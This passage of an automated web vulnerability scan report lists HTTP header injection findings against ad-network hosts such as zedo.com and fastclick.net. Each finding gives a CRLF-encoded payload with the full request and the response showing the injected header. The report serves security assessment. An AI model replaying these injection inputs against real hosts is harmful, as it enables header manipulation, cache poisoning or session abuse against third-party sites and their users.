Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; FFgeo=5386156; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:9bc45
d1fca8116ea
;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFgeo=5386156;expires=Sat, 28 Jan 2012 16:41:09 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
Vary: Accept-Encoding
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=41
Expires: Fri, 28 Jan 2011 16:41:50 GMT
Date: Fri, 28 Jan 2011 16:41:09 GMT
Connection: close
Content-Length: 1920

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=69;var zzPat=',9bc45
d
...[SNIP]...

3.136. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into the Set-Cookie response header. The payload 2fe69%0d%0ac7e535fa282 was submitted in the $ parameter. This caused a response containing an injected HTTP header.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=7/2&a=0&f=&n=951&r=13&d=9&q=&$=2fe69%0d%0ac7e535fa282&s=2&z=0.43167143454775214 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365; ZCBC=1; FFgeo=5386156; FFpb=1220:4f791'; FFcat=1220,101,9; FFad=0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:4f791'$951:2fe69
c7e535fa282
;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,187,9:951,7,9:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1;expires=Mon, 28 Feb 2011 02:00:13 GMT;path=/;domain=.zedo.com;
ETag: "19b436a-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=189
Expires: Sat, 29 Jan 2011 02:03:22 GMT
Date: Sat, 29 Jan 2011 02:00:13 GMT
Connection: close
Content-Length: 2263

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat=',2fe69
c7e5
...[SNIP]...

3.137. http://media.fastclick.net/w/click.here [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.fastclick.net
Path:   /w/click.here

Issue detail

The value of the c request parameter is copied into the Location response header. The payload 61d82%0d%0ac94b6440ba8 was submitted in the c parameter. This caused a response containing an injected HTTP header.

Request

GET /w/click.here?cid=250428;mid=463354;m=1;sid=54393;c=0;tp=5;forced_click=http://clk.pointroll.com/bc/?a=1362053&c=61d82%0d%0ac94b6440ba8&i=EF9A0400-9CDB-6D58-1308-AD40023D0100&clickurl=http://ad.doubleclick.net/jump/N5664.134236.VALUECLICK/B4607923.9%3Bsz=1x1%3Bord=0.33574254042468965 HTTP/1.1
Host: media.fastclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lxc=AgAAAASMFi1NACAABHVydDE3IAfgBAADMwAAluAUHwEAAA==; lyc=BQAAAARmvzBNACAAARhFIASgAAaUMwAANhwpYBcBvUSgFCAABA49AAAZ4AoXQAABiw7gCS8ADSAvwAABaVrACSAAAksAAA==; zru=1|:1294800534|; adv_ic=BxQAAAAcbUNNIAYGAAFJAACZUCAHIAtAAAIes0CAFwdDAACpSAAAYEAUIAABU2jgAS8BP17gAS8CvQ0/4AAvBBtZAAB2ICtAAAFcZ+ABLwDF4AIvAZph4AEXALDgAhcBpmDgARcBAlvgAV8B0FzgARcA/CCPwKcBCFfgARcAviBHAANAdCAAAXhL4AEXAHngAkcBXNWg1yDvAWQ44AFHAIvAvyAXAc1P4AFHAFXgAhcBR1PgAS8AJuACFwAPIHfAjwAD4AIXABjgAhcB/gyhHyBfAbda4AEvANzgAhcAxuACFwDY4AIXACjgAkcA0+ACFwHVXOABRwCr4AIXAXlHwBcBAAA=; vt=10070:256698:477674:54816:0:1295925050:3|10991:274413:511325:54393:0:1296263251:0|; pluto=517004695355|v1; pjw=BBQAAAACIAMDClZDTSAGAQABIAMCYEUEYBMC/fcHIA2AEwEeVOABHwBfoB8A/OACHwEpU+ABHwLmLwRgRwFfzeABPwE7UeABHwRORwQAAyBXAej74AEfAUVQ4AEfBDzSAwAEIB8B+hHgAR8BbkzgAR8BLjeAXwEq3uABHwF4S+ABHwBQIJ9AxwDX4AKfAX9K4AEfAYdBgB8B9fDgAT8BlEjgAR8BWEOAHwGa9eABHwGoRuABHwFSOYAfATz54AEfARxt4AEfAiTpA2E/AMegXwAGIMsBU2jgAR8A7aEfAF2hH0AfAVxn4AEfAFegvwDUoL9AHwGaYeABHwBfoJ8AmKCfQB8BpmDgAR8AbKCfAEugn0AfAc9c4AEfAS8sgL8BS8WAv0AfAdpb4AEfAJGhHwHu8uABHwEIV+ABHwEyRIG/AFLgAn8AOuEC3wHGLoBfAXHM4AE/4QOfASk/gB8BDu3AHwEAAA==;

Response

HTTP/1.1 302 Redirect
Date: Sat, 29 Jan 2011 05:01:39 GMT
Location: http://clk.pointroll.com/bc/?a=1362053&c=61d82
c94b6440ba8
&i=EF9A0400-9CDB-6D58-1308-AD40023D0100&clickurl=http://ad.doubleclick.net/jump/N5664.134236.VALUECLICK/B4607923.9;sz=1x1;ord=0.33574254042468965
P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV'
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Type: text/plain
Content-Length: 0
Set-Cookie: srb=BAUAAAABIAMD+J5DTSAGYAsCUjkEIAmAC0AbYAAAn+ABHwI80gNgEgAFIAXAHwAf4AIfAVhD4Ak/ADHgAh8Bh0HgCR8BPnLgAV8BLyzgAR8ABiBjAwAAAAA=; domain=.fastclick.net; path=/; expires=Mon, 31-Jan-2011 05:01:39 GMT
Set-Cookie: oatmeal=10070:256698:477674:54816:0:1295977917:3|10249:250428:463354:54393:0:1296277299:0|; domain=.fastclick.net; path=/; expires=Mon, 28-Feb-2011 05:01:39 GMT
Set-Cookie: adv_ic=...[SNIP]...; domain=.fastclick.net; path=/; expires=Sun, 29-Jan-2012 05:01:39 GMT
Set-Cookie: pluto=517004695355|v1; domain=.fastclick.net; path=/; expires=Mon, 28-Jan-2013 05:01:39 GMT
Keep-Alive: timeout=5, max=19943
Connection: Keep-Alive


3.138. http://media.fastclick.net/w/click.here [cid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.fastclick.net
Path:   /w/click.here

Issue detail

The value of the cid request parameter is copied into the Location response header. The payload 9c6ba%0d%0ae8afb02647e was submitted in the cid parameter. This caused a response containing an injected HTTP header.

Request

GET /w/click.here?cid=250428;mid=463354;m=1;sid=54393;c=0;tp=5;forced_click=http://clk.pointroll.com/bc/?a=13620539c6ba%0d%0ae8afb02647e&c=1&i=EF9A0400-9CDB-6D58-1308-AD40023D0100&clickurl=http://ad.doubleclick.net/jump/N5664.134236.VALUECLICK/B4607923.9%3Bsz=1x1%3Bord=0.33574254042468965 HTTP/1.1
Host: media.fastclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lxc=AgAAAASMFi1NACAABHVydDE3IAfgBAADMwAAluAUHwEAAA==; lyc=BQAAAARmvzBNACAAARhFIASgAAaUMwAANhwpYBcBvUSgFCAABA49AAAZ4AoXQAABiw7gCS8ADSAvwAABaVrACSAAAksAAA==; zru=1|:1294800534|; adv_ic=BxQAAAAcbUNNIAYGAAFJAACZUCAHIAtAAAIes0CAFwdDAACpSAAAYEAUIAABU2jgAS8BP17gAS8CvQ0/4AAvBBtZAAB2ICtAAAFcZ+ABLwDF4AIvAZph4AEXALDgAhcBpmDgARcBAlvgAV8B0FzgARcA/CCPwKcBCFfgARcAviBHAANAdCAAAXhL4AEXAHngAkcBXNWg1yDvAWQ44AFHAIvAvyAXAc1P4AFHAFXgAhcBR1PgAS8AJuACFwAPIHfAjwAD4AIXABjgAhcB/gyhHyBfAbda4AEvANzgAhcAxuACFwDY4AIXACjgAkcA0+ACFwHVXOABRwCr4AIXAXlHwBcBAAA=; vt=10070:256698:477674:54816:0:1295925050:3|10991:274413:511325:54393:0:1296263251:0|; pluto=517004695355|v1; pjw=BBQAAAACIAMDClZDTSAGAQABIAMCYEUEYBMC/fcHIA2AEwEeVOABHwBfoB8A/OACHwEpU+ABHwLmLwRgRwFfzeABPwE7UeABHwRORwQAAyBXAej74AEfAUVQ4AEfBDzSAwAEIB8B+hHgAR8BbkzgAR8BLjeAXwEq3uABHwF4S+ABHwBQIJ9AxwDX4AKfAX9K4AEfAYdBgB8B9fDgAT8BlEjgAR8BWEOAHwGa9eABHwGoRuABHwFSOYAfATz54AEfARxt4AEfAiTpA2E/AMegXwAGIMsBU2jgAR8A7aEfAF2hH0AfAVxn4AEfAFegvwDUoL9AHwGaYeABHwBfoJ8AmKCfQB8BpmDgAR8AbKCfAEugn0AfAc9c4AEfAS8sgL8BS8WAv0AfAdpb4AEfAJGhHwHu8uABHwEIV+ABHwEyRIG/AFLgAn8AOuEC3wHGLoBfAXHM4AE/4QOfASk/gB8BDu3AHwEAAA==;

Response

HTTP/1.1 302 Redirect
Date: Sat, 29 Jan 2011 05:01:21 GMT
Location: http://clk.pointroll.com/bc/?a=13620539c6ba
e8afb02647e
&c=1&i=EF9A0400-9CDB-6D58-1308-AD40023D0100&clickurl=http://ad.doubleclick.net/jump/N5664.134236.VALUECLICK/B4607923.9;sz=1x1;ord=0.33574254042468965
P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV'
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Type: text/plain
Content-Length: 0
Set-Cookie: srb=BAQAAAABIAMD+J5DTSAGYAsCUjkEIAmAC0AbYAAAn+ABHwI80gNgEgAFIAXAHwAf4AIfAVhD4Ak/AT5y4AE/AS8s4AEfAAYgQwMAAAAA; domain=.fastclick.net; path=/; expires=Mon, 31-Jan-2011 05:01:21 GMT
Set-Cookie: oatmeal=10070:256698:477674:54816:0:1295977917:3|10249:250428:463354:54393:0:1296277281:0|; domain=.fastclick.net; path=/; expires=Mon, 28-Feb-2011 05:01:21 GMT
Set-Cookie: adv_ic=ByAAAAAhn0NNIAYJAAFDAADhWQAAGiALQAABQXegFwRJAAC2USAfQBQgAAHwceABFwH6XeABFwAf4AJHBLBeAAACICtAAABk4AIvAKsgF8BHABvgAi8EAlsAABhALCAAAGHgAi8BmVDgAS8BPnKgdyCnAfxI4AEXAFjgAi8AaOACX+ADL+ADFwBW4AIvAOQg28CPAh6zQOEABwCpIF8AYCCLQAAAUOACLwSLXAAABEAUIAACvQ0/4AAvABshNwB2IBNAAABN4AIvANUgL8EHAEvgAhcB21fgAXcASuACFwAa4AKPAEHgAhcAP+AC1wAg4AIXAHkhN8C/AB3gAhcAxeACLwAY4AIXQZfAL+ADFwFlOOABFwFc1aEHIIsAZOACFwCLwO8gFwTNTwAAA0DsIAAAVeACFwFHU+ABRwAm4AIXAA/gAo8AA+ACFwAY4AIXAf4MoU8gXwG3WuABRwDc4AIXAMbgAhcA2OACFwAo4AJHAMTgAhcAFeACFwCr4AIXAXlHwF8BAAA=; domain=.fastclick.net; path=/; expires=Sun, 29-Jan-2012 05:01:21 GMT
Set-Cookie: pluto=517004695355|v1; domain=.fastclick.net; path=/; expires=Mon, 28-Jan-2013 05:01:21 GMT
Keep-Alive: timeout=5, max=19999
Connection: Keep-Alive


3.139. http://media.fastclick.net/w/click.here [i parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.fastclick.net
Path:   /w/click.here

Issue detail

The value of the i request parameter is copied into the Location response header. The payload 580bf%0d%0a0247a4016c9 was submitted in the i parameter. This caused a response containing an injected HTTP header.

Request

GET /w/click.here?cid=250428;mid=463354;m=1;sid=54393;c=0;tp=5;forced_click=http://clk.pointroll.com/bc/?a=1362053&c=1&i=580bf%0d%0a0247a4016c9&clickurl=http://ad.doubleclick.net/jump/N5664.134236.VALUECLICK/B4607923.9%3Bsz=1x1%3Bord=0.33574254042468965 HTTP/1.1
Host: media.fastclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lxc=AgAAAASMFi1NACAABHVydDE3IAfgBAADMwAAluAUHwEAAA==; lyc=BQAAAARmvzBNACAAARhFIASgAAaUMwAANhwpYBcBvUSgFCAABA49AAAZ4AoXQAABiw7gCS8ADSAvwAABaVrACSAAAksAAA==; zru=1|:1294800534|; adv_ic=BxQAAAAcbUNNIAYGAAFJAACZUCAHIAtAAAIes0CAFwdDAACpSAAAYEAUIAABU2jgAS8BP17gAS8CvQ0/4AAvBBtZAAB2ICtAAAFcZ+ABLwDF4AIvAZph4AEXALDgAhcBpmDgARcBAlvgAV8B0FzgARcA/CCPwKcBCFfgARcAviBHAANAdCAAAXhL4AEXAHngAkcBXNWg1yDvAWQ44AFHAIvAvyAXAc1P4AFHAFXgAhcBR1PgAS8AJuACFwAPIHfAjwAD4AIXABjgAhcB/gyhHyBfAbda4AEvANzgAhcAxuACFwDY4AIXACjgAkcA0+ACFwHVXOABRwCr4AIXAXlHwBcBAAA=; vt=10070:256698:477674:54816:0:1295925050:3|10991:274413:511325:54393:0:1296263251:0|; pluto=517004695355|v1; pjw=BBQAAAACIAMDClZDTSAGAQABIAMCYEUEYBMC/fcHIA2AEwEeVOABHwBfoB8A/OACHwEpU+ABHwLmLwRgRwFfzeABPwE7UeABHwRORwQAAyBXAej74AEfAUVQ4AEfBDzSAwAEIB8B+hHgAR8BbkzgAR8BLjeAXwEq3uABHwF4S+ABHwBQIJ9AxwDX4AKfAX9K4AEfAYdBgB8B9fDgAT8BlEjgAR8BWEOAHwGa9eABHwGoRuABHwFSOYAfATz54AEfARxt4AEfAiTpA2E/AMegXwAGIMsBU2jgAR8A7aEfAF2hH0AfAVxn4AEfAFegvwDUoL9AHwGaYeABHwBfoJ8AmKCfQB8BpmDgAR8AbKCfAEugn0AfAc9c4AEfAS8sgL8BS8WAv0AfAdpb4AEfAJGhHwHu8uABHwEIV+ABHwEyRIG/AFLgAn8AOuEC3wHGLoBfAXHM4AE/4QOfASk/gB8BDu3AHwEAAA==;

Response

HTTP/1.1 302 Redirect
Date: Sat, 29 Jan 2011 05:01:42 GMT
Location: http://clk.pointroll.com/bc/?a=1362053&c=1&i=580bf
0247a4016c9
&clickurl=http://ad.doubleclick.net/jump/N5664.134236.VALUECLICK/B4607923.9;sz=1x1;ord=0.33574254042468965
P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV'
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Type: text/plain
Content-Length: 0
Set-Cookie: srb=BAUAAAABIAMD+J5DTSAGYAsCUjkEIAmAC0AbYAAAn+ABHwI80gNgEgAFIAXAHwAf4AIfAVhD4Ak/ADHgAh8Bh0HgCR8ANuACHwEvLOABHwAGIGMDAAAAAA==; domain=.fastclick.net; path=/; expires=Mon, 31-Jan-2011 05:01:42 GMT
Set-Cookie: oatmeal=10070:256698:477674:54816:0:1295977917:3|10249:250428:463354:54393:0:1296277302:0|; domain=.fastclick.net; path=/; expires=Mon, 28-Feb-2011 05:01:42 GMT
Set-Cookie: adv_ic=...[SNIP]...; domain=.fastclick.net; path=/; expires=Sun, 29-Jan-2012 05:01:42 GMT
Set-Cookie: pluto=517004695355|v1; domain=.fastclick.net; path=/; expires=Mon, 28-Jan-2013 05:01:42 GMT
Keep-Alive: timeout=5, max=19968
Connection: Keep-Alive


3.140. http://na.link.decdna.net/n/49881/49889/www.247realmedia.com/1ykg1it [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://na.link.decdna.net
Path:   /n/49881/49889/www.247realmedia.com/1ykg1it

Issue detail

The value of REST URL parameter 2 is copied into the location response header. The payload bae3a%0d%0a8cac8fd9833 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /n/bae3a%0d%0a8cac8fd9833/49889/www.247realmedia.com/1ykg1it;11;3;;6;;8rue07;;;;;1;/i/c?0&pq=%2fEN%2dUS%2f&1pixgif&referer= HTTP/1.1
Host: na.link.decdna.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Fri, 28 Jan 2011 14:16:11 GMT
Server: Apache/1.3.33 (Unix)
Pragma: no-cache
Expires: Fri, 28 Jan 2011 14:16:11 GMT
location: http://na.link.decdna.net/n/bae3a
8cac8fd9833
/49889/www.247realmedia.com/1ykg1it;11;3;;6;;8rue07;;;;;1;/i/c?0&pq=%2fEN%2dUS%2f&1pixgif&referer=?0&0&pq=%2fEN%2dUS%2f&1pixgif&referer=&bounced
Set-Cookie: %2edecdna%2enet/%2fn%2f0/2/e=1296224171/0/49889/0/0//0///0/0/0/0///0/0//0//0/0; expires=Sun, 27-Feb-2011 14:16:11 GMT; path=/n/0; domain=.decdna.net;
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS COM NAV INT"
Set-Cookie: id=9286424862321017538; expires=Sat, 28-Jan-2012 14:16:11 GMT; path=/; domain=.decdna.net;
Set-Cookie: name=9286424862086137007; path=/; domain=.decdna.net;
Content-Length: 0
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain


3.141. http://na.link.decdna.net/n/49881/49889/www.247realmedia.com/1ykg1it [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://na.link.decdna.net
Path:   /n/49881/49889/www.247realmedia.com/1ykg1it

Issue detail

The value of REST URL parameter 4 is copied into the location response header. The payload d157e%0d%0a9e710a277af was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /n/49881/49889/d157e%0d%0a9e710a277af/1ykg1it;11;3;;6;;8rue07;;;;;1;/i/c?0&pq=%2fEN%2dUS%2f&1pixgif&referer= HTTP/1.1
Host: na.link.decdna.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Fri, 28 Jan 2011 14:16:12 GMT
Server: Apache/1.3.33 (Unix)
Pragma: no-cache
Expires: Fri, 28 Jan 2011 14:16:12 GMT
location: http://na.link.decdna.net/n/49881/49889/d157e
9e710a277af
/1ykg1it;11;3;;6;;8rue07;;;;;1;/i/c?0&0&pq=%2fEN%2dUS%2f&1pixgif&referer=&bounced
Set-Cookie: %2edecdna%2enet/%2fn%2f49881/2/e=1296224172/49881/49889/0/0//0///0/0/0/0///0/0//0//0/0; expires=Sun, 27-Feb-2011 14:16:12 GMT; path=/n/49881; domain=.decdna.net;
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS COM NAV INT"
Set-Cookie: id=9286424825394364597; expires=Sat, 28-Jan-2012 14:16:12 GMT; path=/; domain=.decdna.net;
Set-Cookie: name=9286424825327255845; path=/; domain=.decdna.net;
Content-Length: 0
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain


3.142. http://na.link.decdna.net/n/49881/49889/www.247realmedia.com/1ykg1it [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://na.link.decdna.net
Path:   /n/49881/49889/www.247realmedia.com/1ykg1it

Issue detail

The value of REST URL parameter 5 is copied into the location response header. The payload 4f471%0d%0a5d3c9c04556 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /n/49881/49889/www.247realmedia.com/4f471%0d%0a5d3c9c04556;11;3;;6;;8rue07;;;;;1;/i/c?0&pq=%2fEN%2dUS%2f&1pixgif&referer= HTTP/1.1
Host: na.link.decdna.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Fri, 28 Jan 2011 14:16:13 GMT
Server: Apache/1.3.33 (Unix)
Pragma: no-cache
Expires: Fri, 28 Jan 2011 14:16:13 GMT
location: http://dna1.mookie1.com/n/49881/49889/www.247realmedia.com/4f471
5d3c9c04556
;11;3;;6;;8rue07;;;;;1;/i/c?0&0&pq=%2fEN%2dUS%2f&1pixgif&referer=&redirected
Content-Length: 0
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain


3.143. http://xads.zedo.com/ads2/c [a parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://xads.zedo.com
Path:   /ads2/c

Issue detail

The value of the a request parameter is copied into the Location response header. The payload 166b6%0d%0a77cb3dde500 was submitted in the a parameter. This caused a response containing an injected HTTP header.

Request

GET /ads2/c?a=853584;x=2304;g=172;c=1220000101,1220000101;i=0;n=1220;1=8;2=1;s=69;g=172;m=82;w=47;i=0;u=INmz6woBADYAAHrQ5V4AAACH~010411;p=6;f=990638;h=922865;k=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/166b6%0d%0a77cb3dde500 HTTP/1.1
Host: xads.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Fri, 28 Jan 2011 15:06:34 GMT
Server: ZEDO 3G
Set-Cookie: FFgeo=5386156; path=/; EXPIRES=Sat, 28-Jan-12 15:06:34 GMT; DOMAIN=.zedo.com
Set-Cookie: ZFFbh=826-20110128,20|305_1;expires=Sat, 28 Jan 2012 15:06:34 GMT;DOMAIN=.zedo.com;path=/;
Set-Cookie: PCA922865=a853584Zc1220000101%2C1220000101Zs69Zi0Zt128; path=/; EXPIRES=Sun, 27-Feb-11 15:06:34 GMT; DOMAIN=.zedo.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Location: http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/166b6
77cb3dde500

Vary: Accept-Encoding
Content-Length: 420
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://hpi.rotator.hadj7.adjuggler.net/servlet/
...[SNIP]...

3.144. http://xads.zedo.com/ads2/c [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://xads.zedo.com
Path:   /ads2/c

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 958c6%0d%0a12c64e7ba41 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /ads2/c?a=853584;x=2304;g=172;c=1220000101,1220000101;i=0;n=1220;1=8;2=1;s=69;g=172;m=82;w=47;i=0;u=INmz6woBADYAAHrQ5V4AAACH~010411;p=6;f=990638;h=922865;k=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/&958c6%0d%0a12c64e7ba41=1 HTTP/1.1
Host: xads.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Fri, 28 Jan 2011 15:06:36 GMT
Server: ZEDO 3G
Set-Cookie: FFgeo=5386156; path=/; EXPIRES=Sat, 28-Jan-12 15:06:36 GMT; DOMAIN=.zedo.com
Set-Cookie: ZFFbh=826-20110128,20|305_1;expires=Sat, 28 Jan 2012 15:06:36 GMT;DOMAIN=.zedo.com;path=/;
Set-Cookie: PCA922865=a853584Zc1220000101%2C1220000101Zs69Zi0Zt128; path=/; EXPIRES=Sun, 27-Feb-11 15:06:36 GMT; DOMAIN=.zedo.com
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Location: http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/&958c6
12c64e7ba41
=1
Vary: Accept-Encoding
Content-Length: 427
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://hpi.rotator.hadj7.adjuggler.net/servlet/
...[SNIP]...

4. Cross-site scripting (reflected)
There are 1047 instances of this issue:

Issue background

